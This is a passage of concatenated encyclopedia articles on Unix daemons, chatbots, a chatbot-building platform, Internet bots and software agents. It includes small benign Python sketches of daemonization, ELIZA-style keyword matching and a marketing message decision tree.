systems.[5] After the term was adopted for computer use, it was rationalized as abackronymfor Disk And Execution MONitor.[6][1] Daemons that connect to a computer network are examples ofnetwork services. In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned theinitprocess (process number 1) as its parent process and has no controlling terminal. 
However, more generally, a daemon may be any background process, whether a child of the init process or not. On a Unix-like system, the common method for a process to become a daemon, when the process is started from the command line or from a startup script such as an init script or a SystemStarter script, involves a sequence of steps such as forking and letting the parent exit, dissociating from the controlling terminal by starting a new session, resetting the working directory and file-mode creation mask, and closing or redirecting inherited file descriptors (a code sketch of these steps appears at the end of this section). If the process is started by a super-server daemon, such as inetd, launchd, or systemd, the super-server daemon will perform those functions for the process,[7][8][9] except for old-style daemons not converted to run under systemd and specified as Type=forking[9] and "multi-threaded" datagram servers under inetd.[7] In the Microsoft DOS environment, daemon-like programs were implemented as terminate-and-stay-resident programs (TSR). On Microsoft Windows NT systems, programs called Windows services perform the functions of daemons. They run as processes, usually do not interact with the monitor, keyboard, and mouse, and may be launched by the operating system at boot time. In Windows 2000 and later versions, Windows services are configured and manually started and stopped using the Control Panel, a dedicated control/configuration program, the Service Controller component of the Service Control Manager (sc command), the net start and net stop commands or the PowerShell scripting system. However, any Windows application can perform the role of a daemon, not just a service, and some Windows daemons have the option of running as a normal process. On the classic Mac OS, optional features and services were provided by files loaded at startup time that patched the operating system; these were known as system extensions and control panels. Later versions of classic Mac OS augmented these with fully fledged faceless background applications: regular applications that ran in the background. To the user, these were still described as regular system extensions. macOS, which is a Unix system, uses daemons but uses the term "services" to designate software that performs functions selected from the Services menu, rather than using that term for daemons, as Windows does.
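Below is a minimal sketch of the Unix daemonization steps outlined above, using the classic double-fork recipe. It is comparable in spirit to what daemon(3) does, not a copy of any particular implementation, and assumes a Unix-like system:

```python
import os
import sys

def daemonize():
    """Classic Unix double-fork recipe, comparable in spirit to daemon(3)."""
    if os.fork() > 0:        # first fork: parent exits, child is adopted by init
        sys.exit(0)
    os.setsid()              # become session leader, dropping the controlling tty
    if os.fork() > 0:        # second fork: ensure we can never reacquire a tty
        sys.exit(0)
    os.chdir("/")            # do not keep any directory in use
    os.umask(0)              # reset the file-mode creation mask
    # Redirect the standard streams to /dev/null.
    devnull = os.open(os.devnull, os.O_RDWR)
    for fd in (0, 1, 2):
        os.dup2(devnull, fd)

if __name__ == "__main__":
    daemonize()
    # ... daemon work (e.g. responding to network requests) goes here ...
```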
https://en.wikipedia.org/wiki/Daemon_(computer_software)
Achatbot(originallychatterbot)[1]is asoftwareapplication or web interface designed to have textual or spoken conversations.[2][3][4]Modern chatbots are typicallyonlineand usegenerative artificial intelligencesystems that are capable of maintaining a conversation with a user innatural languageand simulating the way a human would behave as a conversational partner. Such chatbots often usedeep learningandnatural language processing, but simpler chatbots have existed for decades. Although chatbots have existed since the late 1960s, the fieldgained widespread attention in the early 2020sdue to the popularity ofOpenAI'sChatGPT,[5][6]followed by alternatives such asMicrosoft'sCopilot,DeepSeekandGoogle'sGemini.[7]Such examples reflect the recent practice of basing such products upon broadfoundationallarge language models, such asGPT-4or theGemini language model, that getfine-tunedso as to target specific tasks or applications (i.e., simulating human conversation, in the case of chatbots). Chatbots can also be designed or customized to further target even more specific situations and/or particular subject-matter domains.[8] A major area where chatbots have long been used is incustomer serviceandsupport, with various sorts ofvirtual assistants.[9]Companies spanning a wide range of industries have begun using the latestgenerative artificial intelligencetechnologies to power more advanced developments in such areas.[8] In 1950,Alan Turing's famous article "Computing Machinery and Intelligence" was published,[10]which proposed what is now called theTuring testas a criterion ofintelligence. This criterion depends on the ability of acomputer programto impersonate a human in areal-timewritten conversation with a human judge to the extent that the judge is unable to distinguish reliably—on the basis of the conversational content alone—between the program and a real human. The notoriety of Turing's proposed test stimulated great interest inJoseph Weizenbaum's programELIZA, published in 1966, which seemed to be able to fool users into believing that they were conversing with a real human. However Weizenbaum himself did not claim that ELIZA was genuinely intelligent, and the introduction to his paper presented it more as a debunking exercise: In artificial intelligence, machines are made to behave in wondrous ways, often sufficient to dazzle even the most experienced observer. But once a particular program is unmasked, once its inner workings are explained, its magic crumbles away; it stands revealed as a mere collection of procedures. The observer says to himself "I could have written that". With that thought, he moves the program in question from the shelf marked "intelligent", to that reserved for curios. The object of this paper is to cause just such a re-evaluation of the program about to be "explained". Few programs ever needed it more.[11] ELIZA's key method of operation involves the recognition of clue words or phrases in the input, and the output of the corresponding pre-prepared or pre-programmed responses that can move the conversation forward in an apparently meaningful way (e.g. by responding to any input that contains the word 'MOTHER' with 'TELL ME MORE ABOUT YOUR FAMILY').[11]Thus an illusion of understanding is generated, even though the processing involved has been merely superficial. ELIZA showed that such an illusion is surprisingly easy to generate because human judges are ready to give the benefit of the doubt when conversational responses arecapable of being interpretedas "intelligent". 
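ELIZA's clue-word technique, as described above, can be reduced to a few lines of pattern matching. The following Python sketch uses invented rules in ELIZA's style, not Weizenbaum's actual script:

```python
import re

# Minimal ELIZA-style sketch: match a clue word or phrase in the input
# and emit a canned (or template-filled) response. Rules are illustrative.
rules = [
    (r"\bmother\b", "TELL ME MORE ABOUT YOUR FAMILY"),
    (r"\bI am (.*)", lambda m: f"HOW LONG HAVE YOU BEEN {m.group(1).upper()}?"),
]

def respond(text):
    for pattern, response in rules:   # first matching rule wins
        m = re.search(pattern, text, re.IGNORECASE)
        if m:
            return response(m) if callable(response) else response
    return "PLEASE GO ON"             # default keeps the conversation moving

print(respond("I am unhappy about my mother"))
```

As the surrounding text notes, the processing here is entirely superficial, yet a default response and a handful of keyword rules are enough to keep a conversation apparently moving forward.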
Interface designers have come to appreciate that humans' readiness to interpret computer output as genuinely conversational—even when it is actually based on rather simple pattern-matching—can be exploited for useful purposes. Most people prefer to engage with programs that are human-like, and this gives chatbot-style techniques a potentially useful role in interactive systems that need to elicit information from users, as long as that information is relatively straightforward and falls into predictable categories. Thus, for example, online help systems can usefully employ chatbot techniques to identify the area of help that users require, potentially providing a "friendlier" interface than a more formal search or menu system. This sort of usage holds the prospect of moving chatbot technology from Weizenbaum's "shelf ... reserved for curios" to that marked "genuinely useful computational methods". Among the most notable early chatbots are ELIZA (1966) andPARRY(1972).[12][13][14][15]More recent notable programs includeA.L.I.C.E.,Jabberwackyand D.U.D.E (Agence Nationale de la RechercheandCNRS2006). While ELIZA and PARRY were used exclusively to simulate typed conversation, many chatbots now include other functional features, such as games andweb searchingabilities. In 1984, a book calledThe Policeman's Beard is Half Constructedwas published, allegedly written by the chatbotRacter(though the program as released would not have been capable of doing so).[16] From 1978[17]to some time after 1983,[18]the CYRUS project led byJanet Kolodnerconstructed a chatbot simulatingCyrus Vance(57thUnited States Secretary of State). It usedcase-based reasoning, and updated its database daily by parsing wire news fromUnited Press International. The program was unable to process the news items subsequent to the surprise resignation of Cyrus Vance in April 1980, and the team constructed another chatbot simulating his successor,Edmund Muskie.[19][18] One pertinent field of AI research isnatural-language processing. Usually,weak AIfields employ specialized software or programming languages created specifically for the narrow function required. For example, A.L.I.C.E. uses amarkup languagecalled AIML,[3]which is specific to its function as aconversational agent, and has since been adopted by various other developers of, so-called,Alicebots. Nevertheless, A.L.I.C.E. is still purely based onpattern matchingtechniques without any reasoning capabilities, the same technique ELIZA was using back in 1966. This is not strong AI, which would requiresapienceandlogical reasoningabilities. Jabberwacky learns new responses and context based onreal-timeuser interactions, rather than being driven from a staticdatabase. Some more recent chatbots also combine real-time learning withevolutionary algorithmsthat optimize their ability to communicate based on each conversation held. Chatbot competitions focus on the Turing test or more specific goals. Two such annual contests are theLoebner Prizeand The Chatterbox Challenge (the latter has been offline since 2015, however, materials can still be found from web archives).[20] DBpediacreated a chatbot during theGSoCof 2017.[21]It can communicate throughFacebook Messenger. Modern chatbots likeChatGPTare often based onlarge language modelscalledgenerative pre-trained transformers(GPT). They are based on adeep learningarchitecture called thetransformer, which containsartificial neural networks. 
They learn how to generate text by being trained on a large text corpus, which provides a solid foundation for the model to perform well on downstream tasks with limited amounts of task-specific data. Despite criticism of its accuracy and tendency to "hallucinate"—that is, to confidently output false information and even cite non-existent sources—ChatGPT has gained attention for its detailed responses and historical knowledge. Another example is BioGPT, developed by Microsoft, which focuses on answering biomedical questions.[22][23] In November 2023, Amazon announced a new chatbot, called Q, for people to use at work.[24] Many companies' chatbots run on messaging apps or simply via SMS. They are used for B2C customer service, sales and marketing.[25] In 2016, Facebook Messenger allowed developers to place chatbots on their platform. There were 30,000 bots created for Messenger in the first six months, rising to 100,000 by September 2017.[26] Since September 2017, this has also been available as part of a pilot program on WhatsApp. Airlines KLM and Aeroméxico both announced their participation in the testing;[27][28][29][30] both airlines had previously launched customer services on the Facebook Messenger platform. The bots usually appear as one of the user's contacts, but can sometimes act as participants in a group chat. Many banks, insurers, media companies, e-commerce companies, airlines, hotel chains, retailers, health care providers, government entities, and restaurant chains have used chatbots to answer simple questions, increase customer engagement,[31] for promotion, and to offer additional ways to order from them.[32] Chatbots are also used in market research to collect short survey responses.[33] A 2017 study showed 4% of companies used chatbots.[34] In a 2016 study, 80% of businesses said they intended to have one by 2020.[35] Previous generations of chatbots were present on company websites, e.g. Ask Jenn from Alaska Airlines, which debuted in 2008,[36] or Expedia's virtual customer service agent, which launched in 2011.[36][37] The newer generation of chatbots includes IBM Watson-powered "Rocky", introduced in February 2017 by the New York City-based e-commerce company Rare Carat to provide information to prospective diamond buyers.[38][39] Chatbots are also used by marketers to script sequences of messages, very similar to an autoresponder sequence. Such sequences can be triggered by user opt-in or the use of keywords within user interactions. After a trigger occurs, a sequence of messages is delivered until the next anticipated user response. Each user response is used in the decision tree to help the chatbot navigate the response sequences to deliver the correct response message, as in the sketch below.
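A minimal sketch of such a marketer-style sequence as a decision tree, with each node holding a message and the anticipated user replies that select the next node (all content is invented for illustration):

```python
# Sketch of a marketer-style message sequence as a decision tree:
# each node holds the message to deliver and the anticipated user
# responses that select the next node. All content is illustrative.

tree = {
    "start":   {"message": "Want to hear about our sale?",
                "replies": {"yes": "offer", "no": "goodbye"}},
    "offer":   {"message": "20% off this week. Send CODE for a coupon.",
                "replies": {"code": "coupon"}},
    "coupon":  {"message": "Your coupon: SAVE20", "replies": {}},
    "goodbye": {"message": "No problem, have a great day!", "replies": {}},
}

def step(node, user_reply):
    """Deliver the next message given the anticipated user response."""
    next_node = tree[node]["replies"].get(user_reply.lower(), node)
    return next_node, tree[next_node]["message"]

node = "start"
print(tree[node]["message"])
for reply in ["yes", "code"]:        # a simulated conversation
    node, message = step(node, reply)
    print(message)
```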
Companies have used chatbots for customer support, human resources, or inInternet-of-Things(IoT) projects.Overstock.com, for one, has reportedly launched a chatbot named Mila to attempt to automate certain processes when customer service employees request sick leave.[40]Other large companies such asLloyds Banking Group,Royal Bank of Scotland,RenaultandCitroënare now using chatbots instead ofcall centreswith humans to provide a first point of contact.[citation needed]In large companies, like in hospitals and aviation organizations, chatbots are also used to share information within organizations, and to assist and replace service desks.[citation needed] Chatbots have been proposed as a replacement forcustomer servicedepartments.[41] Deep learningtechniques can be incorporated into chatbot applications to allow them to map conversations between users and customer service agents, especially in social media.[42] In 2019,Gartnerpredicted that by 2021, 15% of all customer service interactions globally will be handled completely by AI.[43]A study byJuniper Researchin 2019 estimates retail sales resulting from chatbot-based interactions will reach $112 billion by 2023.[44] In 2016, Russia-based Tochka Bank launched a chatbot onFacebookfor a range of financial services, including a possibility of making payments.[45]In July 2016,Barclays Africaalso launched a Facebook chatbot.[46] In 2023, US-basedNational Eating Disorders Associationreplaced its humanhelplinestaff with a chatbot but had to take it offline after users reported receiving harmful advice from it.[47][48][49] Chatbots are also appearing in the healthcare industry.[50][51]A study suggested that physicians in the United States believed that chatbots would be most beneficial for scheduling doctor appointments, locating health clinics, or providing medication information.[52] ChatGPTis able to answer user queries related to health promotion and disease prevention such as screening andvaccination.[53]WhatsApphas teamed up with theWorld Health Organization(WHO) to make a chatbot service that answers users' questions onCOVID-19.[54] In 2020, theGovernment of Indialaunched a chatbot called MyGov Corona Helpdesk,[55]that worked through WhatsApp and helped people access information about the Coronavirus (COVID-19) pandemic.[56][57] Certain patient groups are still reluctant to use chatbots. A mixed-methods 2019 study showed that people are still hesitant to use chatbots for their healthcare due to poor understanding of the technological complexity, the lack of empathy, and concerns about cyber-security. The analysis showed that while 6% had heard of a health chatbot and 3% had experience of using it, 67% perceived themselves as likely to use one within 12 months. The majority of participants would use a health chatbot for seeking general health information (78%), booking a medical appointment (78%), and looking for local health services (80%). However, a health chatbot was perceived as less suitable for seeking results of medical tests and seeking specialist advice such as sexual health.[58] The analysis of attitudinal variables showed that most participants reported their preference for discussing their health with doctors (73%) and having access to reliable and accurate health information (93%). While 80% were curious about new technologies that could improve their health, 66% reported only seeking a doctor when experiencing a health problem and 65% thought that a chatbot was a good idea. 
30% reported dislike about talking to computers, 41% felt it would be strange to discuss health matters with a chatbot and about half were unsure if they could trust the advice given by a chatbot. Therefore, perceived trustworthiness, individual attitudes towards bots, and dislike for talking to computers are the main barriers to health chatbots.[58][53] In New Zealand, the chatbot SAM – short forSemantic Analysis Machine[59]– has been developed by Nick Gerritsen of Touchtech.[60]It is designed to share its political thoughts, for example on topics such as climate change, healthcare and education, etc. It talks to people through Facebook Messenger.[61][62][63][64] In 2022, the chatbot "Leader Lars" or "Leder Lars" was nominated forThe Synthetic Partyto run in theDanishparliamentary election,[65]and was built by the artist collective Computer Lars.[66]Leader Lars differed from earlier virtual politicians by leading apolitical partyand by not pretending to be an objective candidate.[67]This chatbot engaged in critical discussions on politics with users from around the world.[68] InIndia, the state government has launched a chatbot for its Aaple Sarkar platform,[69]which provides conversational access to information regarding public services managed.[70][71] Chatbots have also been incorporated into devices not primarily meant for computing, such as toys.[72] HelloBarbieis an Internet-connected version of the doll that uses a chatbot provided by the company ToyTalk,[73]which previously used the chatbot for a range of smartphone-based characters for children.[74]These characters' behaviors are constrained by a set of rules that in effect emulate a particular character and produce a storyline.[75] TheMy Friend Cayladoll was marketed as a line of 18-inch (46 cm) dolls which usesspeech recognitiontechnology in conjunction with anAndroidoriOSmobile app to recognize the child's speech and have a conversation. Like the Hello Barbie doll, it attracted controversy due to vulnerabilities with the doll'sBluetoothstack and its use of data collected from the child's speech. IBM'sWatson computerhas been used as the basis for chatbot-based educational toys for companies such asCogniToys,[72]intended to interact with children for educational purposes.[76] Malicious chatbots are frequently used to fillchat roomswith spam and advertisements by mimicking human behavior and conversations or to entice people into revealing personal information, such as bank account numbers. They were commonly found onYahoo! Messenger,Windows Live Messenger,AOL Instant Messengerand otherinstant messagingprotocols. There has also been a published report of a chatbot used in a fake personal ad on a dating service's website.[77] Tay, an AI chatbot designed to learn from previous interaction, caused major controversy due to it being targeted by internet trolls on Twitter. Soon after its launch, the bot was exploited, and with its "repeat after me" capability, it started releasing racist, sexist, and controversial responses to Twitter users.[78]This suggests that although the bot learned effectively from experience, adequate protection was not put in place to prevent misuse.[79] If a text-sendingalgorithmcan pass itself off as a human instead of a chatbot, its message would be more credible. Therefore, human-seeming chatbots with well-crafted online identities could start scattering fake news that seems plausible, for instance making false claims during an election. 
With enough chatbots, it might be even possible to achieve artificialsocial proof.[80][81] Data securityis one of the major concerns of chatbot technologies. Security threats and system vulnerabilities are weaknesses that are often exploited by malicious users. Storage of user data and past communication, that is highly valuable for training and development of chatbots, can also give rise to security threats.[82]Chatbots operating on third-party networks may be subject to various security issues if owners of the third-party applications have policies regarding user data that differ from those of the chatbot.[82]Security threats can be reduced or prevented by incorporating protective mechanisms. Userauthentication, chatEnd-to-end encryption, and self-destructing messages are some effective solutions to resist potential security threats.[82] Chatbots have shown to be an emerging technology used in the field of mental health. Its usage may encourage the users to seek advice on matters of mental health as a means to avoid the stigmatization that may come from sharing such matters with other people.[83]This is because chatbots can give a sense of privacy and anonymity when sharing sensitive information, as well as providing a space that allows for the user to be free of judgment.[83]An example of this can be seen in a study which found that with social media and AI chatbots both being possible outlets to express mental health online, users were more willing to share their darker and more depressive  emotions to the chatbot.[83] Findings prove that chatbots have great potential in scenarios in which it is difficult for users to reach out to family or friends for support.[83]It has been noted that it demonstrates the ability to give young people "various types of social support such as appraisal, informational, emotional, and instrumental support".[83]Studies have found that chatbots are able to assist users in managing things such as depression and anxiety.[83]Some examples of chatbots that serve this function are "Woebot, Wysa, Vivibot, and Tess".[83] Evidence indicates that when mental health chatbots interact with users, they tend to follow certain conversation flows.[84]These being guided conversation, semi guided conversation, and open ended conversation.[84]The most popular, guided conversation, “only allows the users to communicate with the chatbot with predefined responses from the chatbot. 
It does not allow any form of open input from the users”.[84] It has also been noted, in a study looking at the methods employed by various mental health chatbots, that most of them employed a form of cognitive behavioral therapy with the user.[84] Research has identified potential barriers to entry that come with the usage of chatbots for mental health.[85] There are ongoing privacy concerns with sharing users' personal data in chat logs with chatbots.[85] In addition, there is a lack of willingness from those in lower socioeconomic statuses to adopt interactions with chatbots as a meaningful way to improve upon mental health.[85] Though chatbots may be capable of detecting simple human emotions in interactions with users, they are incapable of replicating the level of empathy that human therapists provide.[85] Because chatbots are language models trained on numerous datasets, the issue of algorithmic bias exists.[85] Chatbots with biases built in from their training can express those biases against individuals of certain backgrounds, and this may result in incorrect information being conveyed.[85] There is a lack of research about how exactly these interactions help with a user's real life.[84] Additionally, there are concerns regarding the safety of users when interacting with such chatbots.[84] When improvements and advancements are made to such technologies, how they may affect humans is often not a priority.[84] It is possible that this can lead to "unintended negative consequences, such as biases, inadequate and failed responses, and privacy issues".[84] A risk that may come about from the usage of chatbots to deal with mental health is increased isolation, as well as a lack of support in times of crisis.[84] Another notable risk is a general lack of a strong understanding of mental health.[84] Studies have indicated that mental-health-oriented chatbots have been prone to recommending medical solutions to users and to encouraging heavy reliance on the chatbot itself.[84] Chatbots have difficulty managing non-linear conversations that must go back and forth on a topic with a user.[86] Large language models are more versatile, but require a large amount of conversational data to train. These models generate new responses word by word based on user input, and are usually trained on a large dataset of natural-language phrases.[3] They sometimes provide plausible-sounding but incorrect or nonsensical answers. They can make up names, dates, and historical events, and get even simple math problems wrong.[87] When large language models produce coherent-sounding but inaccurate or fabricated content, this is referred to as "hallucinations". When humans use and apply chatbot content contaminated with hallucinations, the result has been called "botshit".[88] Given the increasing adoption and use of chatbots for generating content, there are concerns that this technology will significantly reduce the cost for humans to generate misinformation.[89] Chatbots, and technology in general, have long been used to automate repetitive tasks.
But advanced chatbots likeChatGPTare also targeting high-paying, creative, and knowledge-based jobs, raising concerns about workforce disruption and quality trade-offs in favor of cost-cutting.[90] Chatbots are increasingly used bysmall and medium enterprises, to handle customer interactions efficiently, reducing reliance on largecall centersand lowering operational costs.[91] Prompt engineering, the task of designing and refining prompts (inputs) leading to desired AI-generated responses has quickly gained significant demand with the advent of large language models,[92]although the viability of this job is questioned due to new techniques for automating prompt engineering.[93] Generative AI uses a high amount ofelectric power. Due to reliance onfossil fuelsin itsgeneration, this increasesair pollution,water pollution, andgreenhouse gas emissions. In 2023, a question toChatGPTconsumed on average 10 times as much energy as a Google search.[94]Data centres in general, and those used for AI tasks specifically, consume significant amounts of water for cooling.[95][96]
https://en.wikipedia.org/wiki/Chatbot
ChatBotis a software platform for creatingchatbotsfor business use released in August 2017.[2] ChatBot (BotEngine) has its origins in a research project created by the companyText(formerly LiveChat Software), which won with this project athackathonin 2016.[3][4][5]In August 2017, LiveChat launched a beta version of the BotEngine chatbots build platform.[6][2][7] In September 2017, LiveChat integrated with BotEngine.[8][9]ChatBot, in its current form, was launched on February 21, 2018.[citation needed]In March 2018, BotEngine was released from itsbeta version.[10]Later that year, the product has been rebranded to ChatBot, following the purchase of thechatbot.comdomain.[11][12][13]In October 2019, ChatBot added a feature to collect customized data about visitors who interacted with bots on websites orFacebook.[14]In May 2020, ChatBot in partnership with Infermedica, launchedCOVID-19Risk Assessment ChatBot.[15] In March 2021, ChatBot launched a new version of Visual Builder.[16] ChatBot is a platform for building automatic chatbots using artificial intelligence.[17][18] ChatBot constructs bots using integration with a range of tools includingFacebook Messenger,LiveChat,Skype,KiK,Slack,TwitterandYouTube.[19][20][21] In 2020, the number of ChatBot clients reached 1,000, including[22]UEFA,Unilever,HTC,Kayak,Danone,Moody's,GM.[23][24]ChatBot supports multiplenon-profit organizations,[25]including:European Mentoring and Coaching Council,[26]Musculoskeletal Australia,[27]Operation Kindness[28]and Tinnitus UK.[29]It is mainly used for connecting and engaging with communities, andfundraising.[30]
https://en.wikipedia.org/wiki/ChatBot
AnInternet bot,web robot,robot, or simplybot,[1]is asoftware applicationthat runs automated tasks (scripts) on theInternet, usually with the intent to imitate human activity, such as messaging, on a large scale.[2]An Internet bot plays theclientrole in aclient–server modelwhereas theserverrole is usually played byweb servers. Internet bots are able to perform simple and repetitive tasks much faster than a person could ever do. The most extensive use of bots is forweb crawling, in which an automated script fetches, analyzes and files information fromwebservers. More than half of all web traffic is generated by bots.[3] Efforts by web servers to restrict bots vary. Some servers have arobots.txtfile that contains the rules governing bot behavior on that server. Any bot that does not follow the rules could, in theory, be denied access to or removed from the affected website. If the posted text file has no associated program/software/app, then adhering to the rules is entirely voluntary. There would be no way to enforce the rules or to ensure that a bot's creator or implementer reads or acknowledges the robots.txt file. Some bots are "good", e.g.search engine spiders, while others are used to launch malicious attacks on political campaigns, for example.[3] Some bots communicate with users of Internet-based services, viainstant messaging(IM),Internet Relay Chat(IRC), or other web interfaces such asFacebook botsandTwitter bots. Thesechatbotsmay allow people to ask questions in plain English and then formulate a response. Such bots can often handle reporting weather,postal codeinformation, sports scores, currency or other unit conversions, etc.[4]Others are used for entertainment, such asSmarterChildonAOL Instant MessengerandMSN Messenger.[citation needed] Additional roles of an IRC bot may be to listen on a conversation channel, and to comment on certain phrases uttered by the participants (based onpattern matching). This is sometimes used as a help service for new users or to censorprofanity.[citation needed] Social bots are sets of algorithms that take on the duties of repetitive sets of instructions in order to establish a service or connection among social networking users. Among the various designs of networking bots, the most common arechat bots, algorithms designed to converse with a human user, and social bots, algorithms designed to mimic human behaviors to converse with patterns similar to those of a human user. The history of social botting can be traced back toAlan Turingin the 1950s and his vision of designing sets of instructional code approved by theTuring test. In the 1960sJoseph WeizenbaumcreatedELIZA, a natural language processing computer program considered an early indicator of artificial intelligence algorithms. ELIZA inspired computer programmers to design tasked programs that can match behavior patterns to their sets of instruction. As a result, natural language processing has become an influencing factor to the development of artificial intelligence and social bots. 
And as information and thought spread en masse on social media websites, innovative technological advancements follow the same pattern.[citation needed] Reports of political interference in recent elections, including the 2016 US and 2017 UK general elections,[5] have made the notion of bots more prevalent because of the ethical questions raised between a bot's design and the bot's designer. Emilio Ferrara, a computer scientist from the University of Southern California, reporting in Communications of the ACM,[6] said that the lack of resources available for fact-checking and information verification results in large volumes of false reports and claims being made by these bots on social media platforms. In the case of Twitter, most of these bots are programmed with search filter capabilities that target keywords and phrases favoring political agendas and then retweet them. While these bots are programmed to spread unverified information throughout the social media platforms,[7] this is a challenge that programmers face in the wake of a hostile political climate. The "Bot Effect" is what Ferrara described as the socialization of bots and human users creating a vulnerability to the leaking of personal information and to polarizing influences outside the ethics of the bot's code; this was confirmed by Guillory Kramer in his study, in which he observed the behavior of emotionally volatile users and the impact the bots have on them, altering their perception of reality.[citation needed]

There has been a great deal of controversy about the use of bots in automated trading. The auction website eBay took legal action in an attempt to stop a third-party company from using bots to look for bargains on its site; this approach backfired on eBay and attracted the attention of further bots. The United Kingdom-based bet exchange Betfair saw such a large amount of traffic coming from bots that it launched a web service API aimed at bot programmers, through which it can actively manage bot interactions.[citation needed] Bot farms are known to be used in online app stores, like the Apple App Store and Google Play, to manipulate positions[8] or to increase positive ratings and reviews.[9]

A rapidly growing, benign form of Internet bot is the chatbot. Since 2016, when Facebook Messenger allowed developers to place chatbots on its platform, there has been exponential growth in their use on that app alone: 30,000 bots were created for Messenger in the first six months, rising to 100,000 by September 2017.[10] Avi Ben Ezra, CTO of SnatchBot, told Forbes that evidence from the use of their chatbot-building platform pointed to a near-future saving of millions of hours of human labor as 'live chat' on websites is replaced with bots.[11] Companies use Internet bots to increase online engagement and streamline communication. Companies often use bots to cut costs; instead of employing people to communicate with consumers, companies have developed new ways to be efficient. These chatbots are used to answer customers' questions: for example, Domino's developed a chatbot that can take orders via Facebook Messenger. Chatbots allow companies to allocate their employees' time to other tasks.[12]

One example of the malicious use of bots is the coordination and operation of an automated attack on networked computers, such as a denial-of-service attack by a botnet.
Internet bots or web bots can also be used to commit click fraud and, more recently, have appeared around MMORPG games as computer game bots. Another category is represented by spambots, Internet bots that attempt to spam large amounts of content on the Internet, usually adding advertising links. More than 94.2% of websites have experienced a bot attack.[3] Malicious bots (and botnets) come in many types. In 2012, journalist Percy von Lipinski reported that he discovered millions of bots, or botted or pinged views, at CNN iReport. CNN iReport quietly removed millions of views from the account of iReporter Chris Morrow.[19] It is not known whether the ad revenue received by CNN from the fake views was ever returned to the advertisers.[citation needed]

The most widely used anti-bot technique is CAPTCHA. Examples of providers include Recaptcha, Minteye, Solve Media, and NuCaptcha. However, CAPTCHAs are not foolproof in preventing bots, as they can often be circumvented by computer character recognition, security holes, and the outsourcing of CAPTCHA solving to cheap laborers.[citation needed]

In the case of academic surveys, protection against automated test-taking bots is essential for maintaining accuracy and consistency in the results of the survey. Without proper precautions against these bots, the results of a survey can become skewed or inaccurate. Researchers indicate that the best way to keep bots out of surveys is not to allow them to enter in the first place: the survey should draw participants from a reliable source, such as an existing department or group at work, so that malicious bots don't have the opportunity to infiltrate the study. Another form of protection against bots is the CAPTCHA test mentioned above, which stands for "Completely Automated Public Turing test to tell Computers and Humans Apart". This test is often used to quickly distinguish a real user from a bot by posing a challenge that a human can easily complete but a bot cannot, such as recognizing distorted letters or numbers, or picking out specific parts of an image, such as traffic lights on a busy street. CAPTCHAs are an effective form of protection because they can be completed quickly, require little effort, and are easy to implement. There are also dedicated companies that specialize in protection against bots, including DataDome, Akamai, and Imperva. These companies offer defense systems to their clients to protect them against DDoS attacks, infrastructure attacks, and cybersecurity threats in general. While these services can be expensive, they can be crucial both for large corporations and for small businesses.

There are two main concerns with bots: clarity and face-to-face support. The cultural background of human beings affects the way they communicate with social bots.[citation needed] Some users recognize that online bots have the ability to "masquerade" as humans online and have become highly aware of their presence. Because of this, some users are becoming unsure when interacting with a social bot.
Many people believe that bots are vastly less intelligent than humans and so not worthy of our respect.[2] Min-Sun Kim proposed five concerns or issues that may arise when communicating with a social robot: avoiding damage to people's feelings, minimizing impositions, disapproval from others, clarity issues, and how effectively the messages come across.[2] People who oppose social robots argue that they also detract from the genuine creation of human relationships.[2] Opponents of social bots also note that their use adds a new, unnecessary layer to privacy protection; many users call for stricter legislation on social bots to ensure that private information remains protected. The discussion of what to do with social bots, and of how far they should go, remains ongoing.

In recent years, political discussion platforms and politics on social media have become highly unstable and volatile. With the introduction of social bots on the political discussion scene, many users worry about their effect on discussions and election outcomes. The biggest offender on the social media side is X (previously Twitter), where heated political discussions are conducted by both bots and real users. The result is a misuse of political discussion on these platforms and a general mistrust among users of what they see.[citation needed]
https://en.wikipedia.org/wiki/Internet_bot
In computer science, a software agent is a computer program that acts for a user or another program in a relationship of agency. The term agent is derived from the Latin agere (to do): an agreement to act on one's behalf. Such "action on behalf of" implies the authority to decide which, if any, action is appropriate.[1][2] Some agents are colloquially known as bots, from robot. They may be embodied, as when execution is paired with a robot body, or exist as software, such as a chatbot executing on a computer or a mobile device, e.g. Siri. Software agents may be autonomous or work together with other agents or people. Software agents interacting with people (e.g. chatbots, human-robot interaction environments) may possess human-like qualities such as natural language understanding and speech, personality, or humanoid form (see Asimo).

Related and derived concepts include intelligent agents (in particular exhibiting some aspects of artificial intelligence, such as reasoning), autonomous agents (capable of modifying the methods of achieving their objectives), distributed agents (executed on physically distinct computers), multi-agent systems (distributed agents that work together to achieve an objective that could not be accomplished by a single agent acting alone), and mobile agents (agents that can relocate their execution onto different processors).

The concept of an agent provides a convenient and powerful way to describe a complex software entity that is capable of acting with a certain degree of autonomy in order to accomplish tasks on behalf of its host. But unlike objects, which are defined in terms of methods and attributes, an agent is defined in terms of its behavior.[3] Various authors have proposed different definitions of agents; these commonly include concepts such as persistence, autonomy, social ability, and reactivity. All agents are programs, but not all programs are agents. Contrasting the term with related concepts may help clarify its meaning. Franklin & Graesser (1997)[4] discuss four key notions that distinguish agents from arbitrary programs: reaction to the environment, autonomy, goal-orientation, and persistence.

Software agents may offer various benefits to their end users by automating complex or repetitive tasks.[6] However, there are organizational and cultural impacts of this technology that need to be considered prior to implementing software agents. People like to perform easy tasks that provide a sensation of success, unless the repetition of simple tasks hurts the overall output. In general, implementing software agents to handle administrative requirements provides a substantial increase in work contentment, as administering one's own work rarely pleases the worker. The effort freed up serves a higher degree of engagement in the substantial tasks of individual work. Hence, software agents may provide the basis for implementing self-controlled work, relieved from hierarchical controls and interference.[7] Such conditions may be secured by the application of software agents for the required formal support. The cultural effects of implementing software agents include trust affliction, skills erosion, privacy attrition, and social detachment. Some users may not feel entirely comfortable fully delegating important tasks to software applications. Those who start relying solely on intelligent agents may lose important skills, for example, relating to information literacy.
In order to act on a user's behalf, a software agent needs a complete understanding of the user's profile, including his or her personal preferences. This, in turn, may lead to unpredictable privacy issues. When users start relying on their software agents more, especially for communication activities, they may lose contact with other human users and look at the world through the eyes of their agents. These consequences are what agent researchers and users must consider when dealing with intelligent agent technologies.[8]

